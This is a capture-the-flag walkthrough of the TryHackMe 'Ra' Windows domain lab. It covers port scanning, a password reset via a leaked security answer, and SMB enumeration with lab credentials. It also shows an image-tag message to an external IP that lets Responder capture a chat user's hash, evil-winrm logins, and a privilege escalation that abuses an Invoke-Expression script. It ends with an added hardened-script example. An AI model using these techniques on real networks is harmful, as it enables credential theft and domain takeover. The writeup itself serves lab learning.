
THM Target Practice Diary 18 - RA

  • Scanning and footprinting

    There are a bit too many open ports to screenshot, so I'm pasting the output directly:

    PORT     STATE SERVICE             VERSION
    53/tcp open domain?
    | fingerprint-strings:
    | DNSVersionBindReqTCP:
    | version
    | bind
    | root-servers
    | nstld
    |_ verisign-grs
    80/tcp open http Microsoft IIS httpd 10.0
    | http-methods:
    |_ Potentially risky methods: TRACE
    88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 08:52:26Z)
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    389/tcp open ldap
    443/tcp open ssl/https?
    | tls-alpn:
    |_ http/1.1
    | ssl-cert: Subject: commonName=Windows Admin Center
    | Subject Alternative Name: DNS:WIN-2FAA40QQ70B
    | Not valid before: 2020-04-30T14:41:03
    |_Not valid after: 2020-06-30T14:41:02
    |_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.
    445/tcp open microsoft-ds?
    464/tcp open kpasswd5?
    593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
    636/tcp open ldapssl?
    2179/tcp open vmrdp?
    3268/tcp open ldap
    3269/tcp open globalcatLDAPssl?
    3389/tcp open ms-wbt-server Microsoft Terminal Services
    |_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=Fire.windcorp.thm
    | Not valid before: 2024-11-06T08:43:29
    |_Not valid after: 2025-05-08T08:43:29
    | rdp-ntlm-info:
    | Target_Name: WINDCORP
    | NetBIOS_Domain_Name: WINDCORP
    | NetBIOS_Computer_Name: FIRE
    | DNS_Domain_Name: windcorp.thm
    | DNS_Computer_Name: Fire.windcorp.thm
    | DNS_Tree_Name: windcorp.thm
    | Product_Version: 10.0.17763
    |_ System_Time: 2024-11-07T08:53:49+00:00
    5222/tcp open jabber
    |_ssl-date: 2024-11-07T08:55:07+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after: 2025-04-30T08:39:00
    | xmpp-info:
    | STARTTLS Failed
    | info:
    | xmpp:
    | version: 1.0
    | errors:
    | invalid-namespace
    | (timeout)
    | features:
    | unknown:
    | compression_methods:
    | stream_id: 19qg18wl2w
    | capabilities:
    |_ auth_mechanisms:
    | fingerprint-strings:
    | RPCCheck:
    |_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
    5269/tcp open xmpp Wildfire XMPP Client
    | xmpp-info:
    | STARTTLS Failed
    | info:
    | xmpp:
    | errors:
    | (timeout)
    | features:
    | unknown:
    | compression_methods:
    | capabilities:
    |_ auth_mechanisms:
    7070/tcp open http Jetty 9.4.18.v20190429
    |_http-server-header: Jetty(9.4.18.v20190429)
    |_http-title: Openfire HTTP Binding Service
    7443/tcp open ssl/oracleas-https?
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after: 2025-04-30T08:39:00
    7777/tcp open socks5 (No authentication; connection failed)
    | socks-auth-info:
    |_ No authentication
    9090/tcp open zeus-admin?
    | fingerprint-strings:
    | GetRequest:
    | HTTP/1.1 200 OK
    | Date: Thu, 07 Nov 2024 08:52:26 GMT
    | Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
    | Content-Type: text/html
    | Accept-Ranges: bytes
    | Content-Length: 115
    | <html>
    | <head><title></title>
    | <meta http-equiv="refresh" content="0;URL=index.jsp">
    | </head>
    | <body>
    | </body>
    | </html>
    | HTTPOptions:
    | HTTP/1.1 200 OK
    | Date: Thu, 07 Nov 2024 08:52:36 GMT
    | Allow: GET,HEAD,POST,OPTIONS
    | JavaRMI, drda, ibm-db2-das, informix:
    | HTTP/1.1 400 Illegal character CNTL=0x0
    | Content-Type: text/html;charset=iso-8859-1
    | Content-Length: 69
    | Connection: close
    | <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
    | SqueezeCenter_CLI:
    | HTTP/1.1 400 No URI
    | Content-Type: text/html;charset=iso-8859-1
    | Content-Length: 49
    | Connection: close
    | <h1>Bad Message 400</h1><pre>reason: No URI</pre>
    | WMSRequest:
    | HTTP/1.1 400 Illegal character CNTL=0x1
    | Content-Type: text/html;charset=iso-8859-1
    | Content-Length: 69
    | Connection: close
    |_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
    9091/tcp open ssl/xmltec-xmlmail?
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after: 2025-04-30T08:39:00
    • Port 80:

      First, look at the site content: there's a pile of people's email addresses, not sure whether they'll be useful.

      Then dig through the page source and find this:

      So add it to /etc/hosts and visit again; it's best to add windcorp.thm at the same time:

      There's a password reset page, but it requires answering the security question.

      Silly me, this thing is right in the top-right corner of the site; no need to read the source.

      A rough scan of both of these turned up nothing much:

      Case solved: it's the personal information leaked on the homepage:

      Namely, employee lilyle's pet name, Sparky. So go reset the password:

      Got the credentials lilyle:ChangeMe#1234

  • Getting a foothold

    Looking at the port scan results, there's no CMS to log into, and SSH isn't open either.

    Next, the idea is to find somewhere I can connect to:

    Seeing 445, try connecting over SMB:

    Running enum4linux directly got blocked:

    So use smbmap with the credentials and take a look:

    smbmap -u lilyle -p ChangeMe#1234 -R -H windcorp.thm

    Under Shared, found the first flag and the version information: spark 2.8.3

    Connect with smbclient //windcorp.thm/Shared -U lilyle and get it:

    While at it, download that Spark package and install it:

    But it timed out:

    Use smbclient //windcorp.thm/Shared -U lilyle -t 500 to extend the timeout; it takes roughly five minutes or so:

    Installing it: no JDK 8, so it won't let me install, haha

    https://www.oracle.com/java/technologies/downloads/

    Put it in /usr/lib/jvm and extract it.

    Edit the environment variables in ~/.zshrc:

    Append at the end:

    export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_381
    export PATH=$JAVA_HOME/bin:$PATH

    Then it can be installed:

    dpkg-deb -X spark_2_8_3.deb /spark

    Then the Java environment broke again, but my laptop was almost out of battery, so I skipped this for now:

    Turns out it's Ignite Realtime Spark; a search goes straight to a CVE:

    This vulnerability allows you to obtain the other chat user's password hash, captured with Responder, by sending them an image in the format <img src=[external_ip]/test.img>.

    First start Responder locally to catch the hash:

    responder -I tun0

    Then log into the client with the credentials from earlier and send anyone a message:

    Responder receives the hash; crack it with john to get the credentials:

    buse:uzunLM+3131

    Then I got stuck and looked at the walkthrough.

    Turns out it was a scanning problem again: I hadn't scanned all the ports.

    nmap --min-rate 10000 -p- 10.10.136.0

    Here, port 5985 should be noted; it runs the WinRM service.

    So evil-winrm can be used to connect:

    evil-winrm -i windcorp.thm -u buse -p uzunLM+3131

    Time to push on; switching to the AttackBox.

    Found Flag 2 on the current user's Desktop.

  • Windows privilege escalation

    No idea, so I peeked at the walkthrough.

    First check the user's group memberships:

    Checked the official documentation and found that this group cannot modify administrator accounts:

    Then went to C:\script and found a PowerShell script.

    Specifically, it reads every line of C:\Users\brittanycr\hosts.txt and executes it via Invoke-Expression.

    So I could try modifying its contents to get command execution, but the current user obviously has no permission to change a hosts.txt in someone else's directory.

    But it does have permission to change other people's passwords (

    net user brittanycr 'qwq2501###'

    Got the credentials brittanycr:qwq2501###

    Frustratingly, I can't connect as this user, so I can only try SMB again:

    smbclient //windcorp.thm/Users -U brittanycr

    Then write a new hosts.txt locally and push it up.

    Then use evil-winrm again to connect as the new account noone:qwq2501#

    evil-winrm -i windcorp.thm -u noone -p 'qwq2501#'

    Connect and get Flag 3.
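    The root cause of this whole escalation chain is a privileged script that executes the lines of a file a lower-privileged user can end up controlling. The following is an added example, not the room's actual C:\script file: the Invoke-Expression pattern the writeup describes beside a hardened rewrite that treats each line as data. The "IPv4 hostname" entry format, the system hosts file as destination and the function names are assumptions about what the script was meant to do.

    ```powershell
    # Added example; the real C:\script file is not reproduced here.
    # The path comes from the writeup; the assumed intent is that each line is a hosts-file entry.
    $HostsTxt = 'C:\Users\brittanycr\hosts.txt'

    # Pattern the writeup describes: every line of hosts.txt is executed as PowerShell,
    # so whoever can write the file (here, anyone able to reset brittanycr's password)
    # runs arbitrary code in the context of the account that launches the script.
    function Invoke-HostsUnsafe {
        Get-Content -LiteralPath $HostsTxt | ForEach-Object { Invoke-Expression $_ }
    }

    # Hardened rewrite (assumed intent): lines are data, never code. Each line must match
    # "<IPv4> <hostname>", and the only action ever taken is a fixed Add-Content call.
    # Returns the number of entries added so the caller can log it.
    function Add-HostsEntrySafe {
        param([string]$Path = $HostsTxt)
        $entryPattern = '^\s*(?<ip>(\d{1,3}\.){3}\d{1,3})\s+(?<name>[A-Za-z0-9.-]{1,253})\s*$'
        $systemHosts  = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
        $added = 0
        foreach ($line in Get-Content -LiteralPath $Path) {
            if ($line -match '^\s*(#|$)') { continue }            # comments and blank lines
            if ($line -match $entryPattern) {
                Add-Content -LiteralPath $systemHosts -Value ("{0} {1}" -f $Matches.ip, $Matches.name)
                $added++
            } else {
                Write-Warning "Rejected malformed line: $line"     # logged, never executed
            }
        }
        return $added
    }

    # Remaining design point: the input file should not live in a user profile at all.
    # Keep it somewhere only Administrators can write (an ACL-restricted ProgramData folder)
    # so that a password reset on a regular user never becomes a write to the script's input.
    ```

    Even with the parser fixed, a scheduled task or service should be audited for any file it reads whose ACL grants write access to accounts outside the administrators group.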